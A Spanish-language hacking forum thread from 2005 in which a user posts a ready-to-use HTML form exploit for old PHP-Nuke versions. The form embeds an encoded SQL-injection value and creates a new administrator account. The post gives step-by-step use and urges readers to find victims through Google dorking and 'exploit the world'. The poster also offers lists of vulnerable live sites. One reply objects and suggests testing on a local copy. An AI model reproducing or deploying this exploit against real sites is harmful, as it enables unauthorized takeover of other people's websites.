elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 21:59  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)  (Leído 1,549 veces)
DjMuggstheRipper

Desconectado Desconectado

Mensajes: 8


ThE rEaL rIpPeR


Ver Perfil
Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
« en: 22 Mayo 2005, 01:11 »

Uno de los primeros exploits que utilice fue este. La verdad es que pocas webs son las afectadas con este exploit, pero siempre hay alguna persona que no lo  actualiza desde hace años ( el del ejemplo xD).

PHP-NUKE para el que no sepa es un sistema de creacion de portales baado en PHP y que utiliza bases de dato SQL.

La idea de este exploit es la de crear un administrador sin ninguna informacion de la web.

El codigo esta en html asi que no tienen que andar con el rollo de compilar.

El siguiente es el codiogo:

<------------------------CUT HERE--------------------------------><form name="mantra" method="POST" action="http://www.victima.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOMBRE:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
<------------------------CUT HERE-------------------------------->
Bueno ahora lo que hace falta hacer es cambiar http://www.victima.com/admin.php por la pagina que queremos explotar.

Al ejecutar les aparecera una ventana con este contenido que deveran rellenar:
Al hacer click en el boton Create Admin los enviara (con suerte) admin.php?op=mod_authors em donde les aparecera algo como esto:

Si al loguearse les aparece un menu de administrador ¡Lo han
logrado ! ! !

Recuerden que solo son administradores normales, es decir que tienen menos atributos que el administrador GOD.

Piensen que el exploit es bastante viejo por lo que funcionara en versiones inferiores (creo) de la 7.0 (por ahi lei que de la 7.4 sin actualizar).

Para saber la version miren en el codigo fuente de la pagina principal que dira algo como:

<META NAME="GENERATOR" CONTENT="PHP-Nuke 5.5 - http://phpnuke.org">

Bueno ahora a bucar POWERED PHP-NUKE en google y explotar el mundoooooooooooooooo!!!!!!!!!!  xxxD

P.D.: Es el primer texto (medianamente) largo que escribo asi que me gustaria saber si les gusto o no.

Saludos
                                                            DjMuggs The RiPPeR
                                                             --------------------->
En línea

www.returnull.tk
La e-zine pensada para vos.
xxDD
DjMuggstheRipper

Desconectado Desconectado

Mensajes: 8


ThE rEaL rIpPeR


Ver Perfil
Re: Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
« Respuesta #1 en: 22 Mayo 2005, 01:22 »

Hola de nuevo
Mi pregunta va dirigida a los admins de este foro:
Puedo ubir las direcciones de algunas webs en las que funciona este exploit para que los alumnos (xD)
puedan provarlo ? ? ?
Muchas gracias por su atencion
DjMuggs The RiPPeR
En línea

www.returnull.tk
La e-zine pensada para vos.
xxDD
rockero

Desconectado Desconectado

Mensajes: 98



Ver Perfil
Re: Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
« Respuesta #2 en: 23 Mayo 2005, 01:49 »

Hola de nuevo
Mi pregunta va dirigida a los admins de este foro:
Puedo ubir las direcciones de algunas webs en las que funciona este exploit para que los alumnos (xD)
puedan provarlo ? ? ?
Muchas gracias por su atencion
DjMuggs The RiPPeR
hahaha chistoso, yo solo soy un miembro mas pero no creo que haya problema en que las pongas para ver si funciona xD, ya lo he visto en otros foros tambien.
En línea
FeRmO


Desconectado Desconectado

Mensajes: 379

Gritemos!


Ver Perfil
Re: Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
« Respuesta #3 en: 23 Mayo 2005, 12:48 »

Yo lo veo mejor si te bajas el paquete de phpnuke a tu ordenador y lo pruebas contigo mismo, porque no hace falta implicar a taerceros para un prueba como esta.

No creo que a la gente le gustase que por "experimentar", les jodieran el trabajo de mucho tiempo.

Además, creo que es norma del foro no poner información directa de terceros.

Lee las normas del foro, en algun post chincheta.
En línea

FeRmO
rockero

Desconectado Desconectado

Mensajes: 98



Ver Perfil
Re: Viejo exploit para php-nuke con ejemplo y todo (solo iniciantes)
« Respuesta #4 en: 23 Mayo 2005, 16:42 »

si ya me lei las reglas xDD esta prohibido dar informacion de terceros  :-[
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Todo el papeleo para montar una empresa, resumido a sólo tres 'clicks' de ratón
Noticias
wolfbcn 0 462 Último mensaje 15 Enero 2012, 13:28
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines